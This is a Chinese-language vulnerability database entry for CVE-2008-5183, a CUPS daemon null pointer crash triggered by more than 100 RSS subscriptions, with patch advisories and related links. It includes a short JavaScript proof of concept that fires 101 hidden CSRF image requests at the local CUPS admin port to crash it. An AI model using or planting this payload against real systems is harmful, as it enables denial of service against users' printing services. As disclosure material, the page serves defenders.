Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:4583
HistoryDec 23, 2008 - 12:00 a.m.

CUPS cupsd RSS订阅空指针引用本地拒绝服务漏洞

2008-12-2300:00:00
Root
www.seebug.org
45

0.007 Low

EPSS

Percentile

77.4%

JSON

BUGTRAQ ID: 32419
CVE(CAN) ID: CVE-2008-5183

Common Unix Printing System(CUPS)是一款通用Unix打印系统,是Unix环境下的跨平台打印解决方案,基于Internet打印协议,提供大多数PostScript和raster打印机服务。

如果向默认监听于631/tcp端口的CUPS守护程序(/usr/sbin/cupsd)添加了多于100个RSS订阅的话,就会触发空指针引用,导致守护程序崩溃。

Easy Software Products CUPS < 1.3.8
RedHat

RedHat已经为此发布了一个安全公告(RHSA-2008:1029-01)以及相应补丁:
RHSA-2008:1029-01:Moderate: cups security update
链接:<a href=“https://www.redhat.com/support/errata/RHSA-2008-1029.html” target=“_blank”>https://www.redhat.com/support/errata/RHSA-2008-1029.html</a>


                                                &lt;script&gt;
// make 101 CSRFed requests to CUPS daemon via &amp;apos;img&amp;apos; tags
// causes CUPS daemon to crash
// by Adrian &amp;apos;pagvac&amp;apos; Pastor | GNUCITIZEN.org

for(var i=1;i&lt;=101;++i) {
    document.write(&quot;&lt;img width=0 height=0 &quot; +
        &quot;src=\&quot;http://localhost:631/admin/?OP=add-rss-subscription&amp;SUBSCRIPTION_NAME=DOS_TEST_&quot; +
        i + &quot;&amp;PRINTER_URI=%23ALL%23&amp;EVENT_JOB_CREATED=on&amp;MAX_EVENTS=20\&quot;&gt;&quot;);
}
&lt;/script&gt;

Related

redhat 1
openvas 24
nessus 12
centos 1
veracode 1
oraclelinux 1
debiancve 1
ubuntucve 1
prion 1
cve 1
fedora 7
securityvulns 1
ubuntu 1
osv 1
debian 1
redhat
redhat
(RHSA-2008:1029) Moderate: cups security update
2008-12-15 00:00:00
openvas
openvas
RedHat Update for cups RHSA-2008:1029-01
2009-03-06 00:00:00
RedHat Update for cups RHSA-2008:1029-01
2009-03-06 00:00:00
Oracle: Security Advisory (ELSA-2008-1029)
2015-10-08 00:00:00
nessus
nessus
Oracle Linux 5 : cups (ELSA-2008-1029)
2013-07-12 00:00:00
Fedora 8 : cups-1.3.9-2.fc8 (2008-10911)
2008-12-10 00:00:00
Fedora 9 : cups-1.3.9-2.fc9 (2008-10917)
2008-12-10 00:00:00
centos
centos
cups security update
2008-12-16 01:12:28
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:29:05
oraclelinux
oraclelinux
cups security update
2008-12-15 00:00:00
debiancve
debiancve
CVE-2008-5183
2008-11-21 02:30:00
ubuntucve
ubuntucve
CVE-2008-5183
2008-11-21 00:00:00
prion
prion
Null pointer dereference
2008-11-21 02:30:00
cve
cve
CVE-2008-5183
2008-11-21 02:30:00
fedora
fedora
[SECURITY] Fedora 10 Update: cups-1.3.9-4.fc10
2008-12-09 11:33:13
[SECURITY] Fedora 10 Update: cups-1.3.11-2.fc10
2009-12-02 04:49:04
[SECURITY] Fedora 10 Update: cups-1.3.11-4.fc10
2009-12-04 23:49:33
securityvulns
securityvulns
CUPS integer overflow
2008-12-03 00:00:00
ubuntu
ubuntu
CUPS vulnerabilities
2009-01-12 00:00:00
osv
osv
cups - several
2011-03-02 00:00:00
debian
debian
[SECURITY] [DSA 2176-1] cups security update
2011-03-01 23:31:10

0.007 Low

EPSS

Percentile

77.4%

JSON
Related for SSV:4583
redhat1openvas24nessus12centos1veracode1oraclelinux1debiancve1ubuntucve1prion1cve1fedora7securityvulns1ubuntu1osv1debian1